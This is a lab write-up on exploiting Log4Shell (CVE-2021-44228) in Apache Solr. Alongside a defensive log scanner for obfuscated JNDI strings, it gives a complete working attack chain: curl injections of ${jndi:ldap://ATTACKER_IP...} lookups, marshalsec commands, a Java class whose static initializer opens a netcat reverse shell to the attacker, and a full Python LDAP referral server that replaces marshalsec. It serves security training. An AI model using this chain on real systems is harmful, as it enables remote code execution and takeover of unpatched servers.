The exploitation of a vulnerability named Log4Shell (CVE-2021-44228)

Intro

This lab covers the exploitation of a vulnerability in Log4j.

Apache Solr 8.11.0 is running on the target machine, and this version ships a Log4j 2 package vulnerable to CVE-2021-44228. The application runs on Java 1.8.0_181, which matters for the technique below: loading classes from an LDAP-supplied codebase (com.sun.jndi.ldap.object.trustURLCodebase) is still enabled by default on 8u181 and was turned off in 8u191, so a patched JVM would need a different gadget chain.

Enum

The Solr Admin Dashboard shows clear indicators that Log4j is used for logging:

To find an injection point we can review Solr's log files. solr.log contains a large number of INFO entries for repeated requests to one endpoint, /solr/admin/cores.

Every entry includes a params field: the request parameters are written into the log verbatim, so they are a candidate injection point. The same request is visible in traffic inspected through a proxy:

PoC

Log4j 2 does not simply write the message it is handed: it scans it for ${...} lookups and substitutes their values to enrich the entry (for example ${env:HOME} or ${java:version}). One of those lookups is jndi:, which makes the JVM retrieve an object from a remote naming service such as LDAP, and on older JVMs that object can be a class loaded from an attacker-controlled URL. That is the gist of CVE-2021-44228: any user-controlled data that reaches a log statement can trigger remote code execution.
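The following Python is an added example, not code from the original post or from the TryHackMe room. It shows the defensive side of the solr.log review above: it scans constructed solr.log lines for ${jndi:...} lookups, first collapsing the lower:/upper:/":-default" nesting that attackers use to hide the string jndi, in the innermost-first order Log4j 2 itself uses. The sample log lines, IP addresses and ports are made up for the example.

```python
import re

# Constructed solr.log lines (not taken from the lab box) in Solr's request-log format.
# Line 1 is the dashboard's normal polling; lines 2-3 are probes against the params
# field discussed above; line 4 is a non-jndi lookup that must not be flagged.
SAMPLE_SOLR_LOG = [
    "2021-12-14 09:58:01.004 INFO  (qtp1-19) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null "
    "path=/admin/cores params={indexInfo=false&wt=json&_=1639475881000} status=0 QTime=0",
    "2021-12-14 09:59:12.310 INFO  (qtp1-22) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null "
    "path=/admin/cores params={_=${jndi:ldap://10.10.14.5:1389/Log4jshell}} status=0 QTime=1",
    "2021-12-14 09:59:40.877 INFO  (qtp1-22) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null "
    "path=/admin/cores params={_=${${lower:j}${::-n}${::-d}i:${env:NOPE:-l}dap://10.10.14.5:1389/a}} "
    "status=0 QTime=1",
    "2021-12-14 10:01:05.002 INFO  (qtp1-23) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null "
    "path=/admin/cores params={_=${date:yyyy}} status=0 QTime=0",
]

# A lookup whose body contains no further ${...}; Log4j evaluates these first.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve(body: str):
    """Evaluate one lookup body offline; None means it cannot be resolved here.

    Only the transformations used to hide the string 'jndi' are modelled:
    lower:/upper: and the ':-default' fallback for any prefix (${env:NOPE:-j},
    ${::-j}). jndi:, env:, sys:, date: and the like are left intact.
    """
    prefix, sep, rest = body.partition(":")
    if not sep:
        return None
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    _key, has_default, default = rest.partition(":-")
    return default if has_default else None


def deobfuscate(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups innermost-first, the way Log4j 2 would."""
    frozen = []  # unresolvable lookups parked under placeholders so the loop terminates

    def substitute(match):
        value = _resolve(match.group(1))
        if value is None:
            frozen.append(match.group(0))
            return f"\x00{len(frozen) - 1}\x00"
        return value

    for _ in range(max_rounds):
        new_text = INNERMOST.sub(substitute, text)
        if new_text == text:
            break
        text = new_text
    # Later placeholders may wrap earlier ones, so restore newest first.
    for index in reversed(range(len(frozen))):
        text = text.replace(f"\x00{index}\x00", frozen[index])
    return text


def find_jndi_lookups(line: str):
    """Return every jndi: lookup in a log line after de-obfuscation."""
    return JNDI.findall(deobfuscate(line))


def scan(lines):
    """Map each offending line number (1-based) to the lookups found in it."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := find_jndi_lookups(line))}


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_SOLR_LOG).items():
        print(f"line {number}: {hits}")
```

A plain grep for jndi: misses the third sample line; the normaliser reports it as the ${jndi:ldap://...} string Log4j would actually have tried to resolve. Lookups that cannot be evaluated offline are deliberately left untouched rather than guessed.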

To exploit this issue we need an LDAP server under our control that answers the JNDI lookup.

marshalsec provides one (marshalsec.jndi.LDAPRefServer):

We need an IP address the target can reach (a public one, or the VPN address in a lab) and two ports: one for the LDAP server and one for the HTTP server that hosts the malicious class.

Before building the full chain, let's confirm that the target is vulnerable. Start a netcat listener on LDAP_PORT, then send a request whose _ parameter carries a JNDI lookup pointing at it (the backslashes stop curl's own {} URL globbing from consuming the braces):

curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LDAP_PORT\}'

Output:

From the output we can see that the netcat listener received a connection from the target: the lookup was performed, so the instance is vulnerable.

Next, build the marshalsec utility by running the command below inside a clone of its repository:

mvn clean package -DskipTests

With the marshalsec utility we start an LDAP referral server that answers every lookup by redirecting the JVM to our HTTP server; the part after the # is the name of the class it should load:

sudo java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ATTACKER_IP:8000/#Log4jshell

Now we create the malicious class. Its payload sits in a static initializer, so it runs as soon as the JVM loads the class, before anything is instantiated. It spawns a reverse shell with netcat, which requires a netcat on the target that supports -e (OpenBSD netcat does not).

Log4jshell.java:

public class Log4jshell {
    // Runs during class loading, i.e. as soon as the JNDI client fetches the class
    static {
        try {
            // Reverse shell back to the attacker's netcat listener on LPORT
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash ATTACKER_IP LPORT");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compile the payload. If the JDK doing the compiling is newer than the target's Java 8, pass --release 8 to javac so the class file version is accepted by the target JVM:

javac Log4jshell.java

Output:

With Python we can run an HTTP server that hosts the compiled class; run it from the directory containing Log4jshell.class:

python3 -m http.server 8000

Finally, with the netcat listener waiting on LPORT, we request the lookup again, this time with the class name as the LDAP path. The referral sends the JVM to the HTTP server for Log4jshell.class, the static initializer runs, and the reverse shell connects back:

curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LDAP_PORT/Log4jshell\}'

Output:
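To make the LDAP step concrete, here is a minimal stand-in for what marshalsec's LDAPRefServer does, written as an added example for this page (it is not marshalsec's code and not part of the original post). It answers the JVM's anonymous bind, then replies to the search for the requested name with an entry whose javaCodeBase and javaFactory attributes point at the HTTP server and the class. The JVM fetches and loads that class only while com.sun.jndi.ldap.object.trustURLCodebase is true, which is the default on Java 8u181 but not on 8u191 and later. ATTACKER_IP, the ports and Log4jshell are placeholders for the lab values.

```python
"""Minimal LDAP referral responder, a stand-in for marshalsec.jndi.LDAPRefServer.
Added example, not marshalsec's code. ATTACKER_IP, ports and class name are placeholders.
"""
import socket

LDAP_PORT = 1389                          # placeholder: the port used in the jndi: URL
CODEBASE = "http://ATTACKER_IP:8000/"     # placeholder: where http.server serves the class
FACTORY = "Log4jshell"                    # class name, without .class


def _tlv(tag: int, payload: bytes) -> bytes:
    """One BER element: tag, definite length (short or long form), payload."""
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        octets = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(octets)]) + octets
    return bytes([tag]) + length + payload


def _int(value: int) -> bytes:
    """BER INTEGER for the non-negative values LDAP message IDs use."""
    return _tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big"))


def parse_tlv(buf: bytes):
    """Decode one BER element -> (tag, payload, remaining); ValueError if truncated."""
    if len(buf) < 2:
        raise ValueError("incomplete")
    tag, first = buf[0], buf[1]
    if first < 0x80:
        length, pos = first, 2
    else:
        count = first & 0x7F
        if len(buf) < 2 + count:
            raise ValueError("incomplete")
        length, pos = int.from_bytes(buf[2:2 + count], "big"), 2 + count
    if len(buf) < pos + length:
        raise ValueError("incomplete")
    return tag, buf[pos:pos + length], buf[pos + length:]


def ldap_result(app_tag: int, msg_id: int) -> bytes:
    """LDAPMessage carrying an LDAPResult: resultCode success(0), empty DN and message."""
    result = _tlv(0x0A, b"\x00") + _tlv(0x04, b"") + _tlv(0x04, b"")
    return _tlv(0x30, _int(msg_id) + _tlv(app_tag, result))


def search_result_entry(msg_id: int, dn: bytes, codebase: str, factory: str) -> bytes:
    """SearchResultEntry ([APPLICATION 4]) that the JNDI client decodes as a Reference."""
    def attribute(name: str, value: str) -> bytes:
        return _tlv(0x30, _tlv(0x04, name.encode()) + _tlv(0x31, _tlv(0x04, value.encode())))

    attributes = (attribute("objectClass", "javaNamingReference")
                  + attribute("javaClassName", "foo")     # dummy value, as marshalsec sets it
                  + attribute("javaCodeBase", codebase)   # URL the JVM downloads the class from
                  + attribute("javaFactory", factory))    # class it fetches and loads
    return _tlv(0x30, _int(msg_id) + _tlv(0x64, _tlv(0x04, dn) + _tlv(0x30, attributes)))


def respond(message: bytes, codebase: str = CODEBASE, factory: str = FACTORY) -> bytes:
    """Reply to one LDAPMessage from the JNDI client; b'' when no reply is due."""
    _, body, _ = parse_tlv(message)
    _, msg_id_bytes, rest = parse_tlv(body)
    msg_id = int.from_bytes(msg_id_bytes, "big")
    op, op_body, _ = parse_tlv(rest)
    if op == 0x60:                               # BindRequest -> BindResponse success
        return ldap_result(0x61, msg_id)
    if op == 0x63:                               # SearchRequest -> entry + SearchResultDone
        _, base_dn, _ = parse_tlv(op_body)       # baseObject is the path from the jndi: URL
        return search_result_entry(msg_id, base_dn, codebase, factory) + ldap_result(0x65, msg_id)
    return b""                                   # UnbindRequest etc.: nothing to send


def handle(conn: socket.socket, codebase: str, factory: str) -> None:
    """Serve one JVM: split the byte stream into LDAPMessages and answer each."""
    with conn:
        buf = b""
        while chunk := conn.recv(4096):
            buf += chunk
            while True:
                try:
                    _, _, after = parse_tlv(buf)
                except ValueError:
                    break                        # partial message, keep reading
                message, buf = buf[:len(buf) - len(after)], after
                if reply := respond(message, codebase, factory):
                    conn.sendall(reply)


def serve(host: str = "0.0.0.0", port: int = LDAP_PORT,
          codebase: str = CODEBASE, factory: str = FACTORY) -> None:
    """Accept lookups one at a time, which is enough for a lab."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen()
        print(f"[*] LDAP referral listener on {host}:{port} -> {codebase}#{factory}")
        while True:
            conn, peer = srv.accept()
            print(f"[+] lookup from {peer[0]}:{peer[1]}")
            handle(conn, codebase, factory)


if __name__ == "__main__":
    serve()
```

Run it in place of the marshalsec command (adjusting CODEBASE and LDAP_PORT to your listener), keep the python3 -m http.server 8000 instance running, and issue the same curl request; a successful referral prints the connecting IP here and a GET for /Log4jshell.class appears in the HTTP server's output.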

Disclaimer
All information and code are provided solely for educational purposes and/or for testing your own systems for these vulnerabilities.

For further practice you can follow the THM room:
https://tryhackme.com/room/solar

Published

Originally published at https://www.hackersnotes.com on December 14, 2021.
